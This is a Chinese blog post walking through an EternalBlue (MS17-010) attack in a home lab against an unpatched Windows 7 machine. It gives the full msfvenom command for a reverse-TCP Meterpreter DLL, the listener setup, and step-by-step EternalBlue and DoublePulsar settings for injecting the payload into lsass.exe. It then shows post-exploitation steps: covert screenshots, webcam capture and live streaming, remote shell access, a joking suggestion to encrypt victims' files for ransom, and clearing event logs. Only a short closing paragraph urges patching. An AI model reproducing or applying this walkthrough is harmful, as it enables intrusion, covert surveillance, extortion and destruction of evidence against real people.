关于NSA的EternalBlue（永恒之蓝） ms17-010漏洞利用

ゝ一世哀愁。 2021-11-22 22:24 328阅读 0赞

好久没有用这个日志了，最近WannaCry横行，媒体铺天盖地的报道，我这后知后觉的才想起来研究下WannaCry利用的这个原产于美帝的国家安全局发现的漏洞，发现漏洞不说，可以，自己偷偷的用，也可以，可是，你不能泄露出来啊，我们要感谢伟大的组织Shadow Brokers（影子经纪人）多酷炫的名字，有木有很文艺的感觉，感谢他让我们小屁民也用用NSA的工具，O(∩\_∩)O哈哈哈~，2016 年 8 月Shadow Brokers入侵了方程式组织（Equation Group是NSA下属的黑客组织）窃取了大量机密文件，并将部分文件公开到了互联网上，这部分被公开的文件包括不少隐蔽的地下的黑客工具。另外Shadow Brokers还保留了部分文件，打算以公开拍卖的形式出售给出价最高的竞价者，预期的价格是 100 万比特币（价值接近5亿美元）。Shadow Brokers的工具一直没卖出去……（是不是很糗），一怒之下哈哈，把工具免费的放出来了，EternalBlue就是这样被公开了，后来就有了利用公布的这个漏洞四处横行的WannaCry。四处找寻，找到了这些工具，完了来实验下，哎，不亏是NSA御用的，老好用了。其实人家工具包里有特别牛的攻击负载，但是那东西来路不正，没敢用，所以只用工具包里面的EternalBlue还有就是Doublepulsa，EternalBlue这个工具就是利用windows系统的Windows SMB 远程执行代码漏洞向Microsoft 服务器消息块 (SMBv1) 服务器发送经特殊设计的消息，就能允许远程代码执行。没有使用现成的攻击载荷，而是用MSF生成一个攻击载荷，用Doublepulsa注入到EternalBlue攻击的系统上。  
    需要三台电脑  
  
    一台windows7 正版 sp1（没有更新到最新的补丁），ip：192.168.1.179，什么都不需要做，开机，知道IP就可以了  
    就是这个倒霉蛋我的笔记本（用了7年了）

![图片][Center]

一台用来运行攻击程序，注入dll的，因为EternalBlue需要python2.6.6，32位，以及pywin32-221，32位版本，所以攻击的电脑需要时32位的，我用的是一台windowsXP   ip地址192.168.1.180

![图片][Center 1]

还需要一台电脑 这个是控制端，用来控制被入侵的电脑，linux系统，这个还有个功能就是使用msf生成攻击负载，msf是什么就不说了，攻击入侵，杀人越货之必备良品。

![图片][Center 2]

首先我们要利用msfvenom生成一个负载，就是一个木马了，帮我们干活的东西，我要在64位的电脑上运行木马，所以生成木马的命令如下：  
msfvenom -p windows/x64/meterpreter/reverse\_tcp LHOST=192.168.1.41 LPORT=5555 -f dll > /root/dll/systemSet.dll  
三个地方 一个就是控制端的地址，一个是使用的端口，一个是生成文件的存放位置。哦 还有就是 模块，用于64位的windows

![图片][Center 3]

生成后，将dll文件拷贝到攻击用电脑上完了就是利用EternalBlue攻击受害系统，成功后使用Doublepulsa将刚刚生成的木马，远程，人不知，鬼不觉的注入到受害系统上去，从控制机上控制受害机。

![图片][Center 4]

接着在msf下开启msfpaylod监听等着被控制端上线。  
$ msfconsole，开启msfconsole，看看这是不是很帅，很帅

![图片][Center 5]

![图片][Center 6]

接下来设置开启监听  
msf > useexploit/multi/handler  
msf > set LHOST 192.168.1.41  
msf > set LPORT 5555  
msf > set PAYLOAD windows/x64/meterpreter/reverse\_tcp  
msf > exploit  
等着倒霉蛋上钩吧

![图片][Center 7]

接下来就是重头戏了，在安装好环境的攻击机上复制好NSA的超牛工具，执行windows目录下的fb.py，源文件要修改下，注释掉26、27、28、72四行。

![图片][Center 8]

需要设置的有攻击IP地址192.168.1.179（受害者），回调地址192.168.1.180（攻击机），关闭重定向，设置日志路径，新建或选择一个project其他都是默认值回车即可。

![图片][Center 9]

接下来输入命令开启永恒之蓝开始攻击：  
use ETERNALBLUE  
依次填入相关参数，超时时间等默认参数可以直接回车，需要注意的就是，选择被攻击方的操作系统目标系统信息，以及攻击模式选择FB

![图片][Center 10]

![图片][Center 11]

看到 这个 Eternalblue Succeeded，攻击完成

![图片][Center 12]

接下来开始使用Doublepulsar，把刚刚生成的木马注入到受害系统中去  
use Doublepulsar

![图片][Center 13]

一路回车，需要注意的就是选择目标操作系统架构，系统后门的执行方式选择Rundll

![图片][Center 14]

填写刚刚生成的那个木马dll文件的地址

![图片][Center 15]

这个是填写你要注入的进程，默认是lsass.exe 默认就是最好的，直接回车

![图片][Center 16]

看到这个吗？Doublepulsar Succeeded ,已经成功把dll木马注入到受操控的系统中。攻击机的使命到此结束

![图片][Center 17]

返回到控制机，看看倒霉蛋已经上线了

![图片][Center 18]

再看看倒霉蛋，还是浑然不觉，很正常的在运行。

![图片][Center 19]

接下来，先用sysinfo看看倒霉蛋的信息，使用webcam\_list 看看被控制的电脑有没有摄像头，routes查看路由表

![图片][Center 20]

这个screenshot，就是截取被控制端电脑的屏幕看看

![图片][Center 21]

这个就是截取到的图片

![Center 22][]

这个是打开被控制端的摄像头，拍一张图片

![图片][Center 23]

这个就是摄像头拍到的图片

![图片][Center 24]

下面这个就是开启摄像头直播，把摄像头拍摄的数据流传送回来，直接直播，哈哈哈

![图片][Center 25]

这个就是直播呢

![图片][Center 26]

shell，获取被控制系统的shell，就是像在你电脑上运行cmd一样，啥命令都可以执行，最高权限，被控制端上没有任何的提示。可以cmd rar 把被控制端上看着有用的文件给加密压缩了，哈哈，完了留个消息，给钱给密码，不给钱，你也打不开文件，哈哈 想哭 就是这么干的……

![图片][Center 27]

dir下被控制端的c盘有哪些文件

![图片][Center 28]

能做到很多呢，上传，下载文件，执行文件 等等等 没有做不到，只有想不到…… msf是不是很牛。  
玩完了，记得清理掉痕迹，清理被控制端的日志  
clearev

![图片][Center 29]

这个是不是很恐怖，所以，安全很重要，系统要用正版的，倒不至于去买正版，但是最起码要安装原版，完了各种办法去激活想正式版一样的享受升级，补丁……，万万不可用各种系统ghost，确实很快，很快，但是也很危险 很危险，想想这个远程控制你需要漏洞，需要好的攻击工具，很麻烦，如果把木马提前放到ghost映像里面，你安装直接就在系统了，直接控制根本不需要什么攻击和漏洞，看看这次大规模爆发，校园首当其冲，再有就是网络比较大的单位，一是他们是局域网，正中，还有一个原因就是他们的操作系统多数都是30块在大街上ghost的，或者小铺ghost的，微软早在3月14日就发布了ms17-010漏洞的补丁，ETERNALBLUE是在4月14日才释放出来，要不是wannacry大规模爆发，根本不会关注这个漏洞，不会去下载补丁。

转载于:https://www.cnblogs.com/cnbluerain/p/6876411.html

[Center]: /images/20211122/9f650afe71e9495aa33720d1bf1bb81a.png
[Center 1]: /images/20211122/b1e77c0aebd34504a5da6a2dc786e26c.png
[Center 2]: /images/20211122/2d932a974a9f4d949e5031ac5c93af6b.png
[Center 3]: /images/20211122/47a1c3f4b49e47099485be6b5fb4afb2.png
[Center 4]: /images/20211122/cdffbcb7369442bcbbc2eee11536df8d.png
[Center 5]: /images/20211122/e15eaff0855948878607575e3683f014.png
[Center 6]: /images/20211122/837d0d5d362a47c6911c18b22bdd4a5d.png
[Center 7]: /images/20211122/7bc730fc246f48f69a0cf242b488ce9c.png
[Center 8]: /images/20211122/74f843424e624ad18410733695bdffa4.png
[Center 9]: /images/20211122/dd1c72de94204df9b5e1b02c9a9807a5.png
[Center 10]: /images/20211122/cefdb1f7a3b24ba88ed8a8887bd89cbe.png
[Center 11]: /images/20211122/79bf9b7203fc401d9e9df8b2b2bc7a23.png
[Center 12]: /images/20211122/17bf00cf8d8f495987eb418af05caf10.png
[Center 13]: /images/20211122/cb60b3c3df704dc0bc601d5eb4901878.png
[Center 14]: /images/20211122/ab88b70c702a429a921de0522e3e1cd2.png
[Center 15]: /images/20211122/cae756aa165e47edba8c5fbee8f5ad93.png
[Center 16]: /images/20211122/a0eacb0d8c3447a8b193f03c92b7d2aa.png
[Center 17]: /images/20211122/c8869d2ba6104b33a767d7faefc9ae78.png
[Center 18]: /images/20211122/4d02b1c452414ceeae6e1c5611f26ce3.png
[Center 19]: /images/20211122/e46b2aa051ca4bff82b82bfd109d61a8.png
[Center 20]: /images/20211122/5700f13967654394a5fafc9f1cffa2c8.png
[Center 21]: /images/20211122/87dc4e6016684bcfbe950a6221a4cd2b.png
[Center 22]: /images/20211122/ac3842a3ce324a47be5f91ce655a9725.png
[Center 23]: /images/20211122/e66dc1f528d347518f88bd992c980bff.png
[Center 24]: /images/20211122/ba0fd1891e0b45bb99f6b5544e5abec0.png
[Center 25]: /images/20211122/337889cc25d7441abf45b81fe0417b08.png
[Center 26]: /images/20211122/6a34f75c41594846bebf56cb60991f09.png
[Center 27]: /images/20211122/83085fb7c71646ddbd08550938589264.png
[Center 28]: /images/20211122/b6e82c69bc294938aad8608ac0d4bf21.png
[Center 29]: /images/20211122/6fd48b2578bc4aea803f28d059a0ab8c.png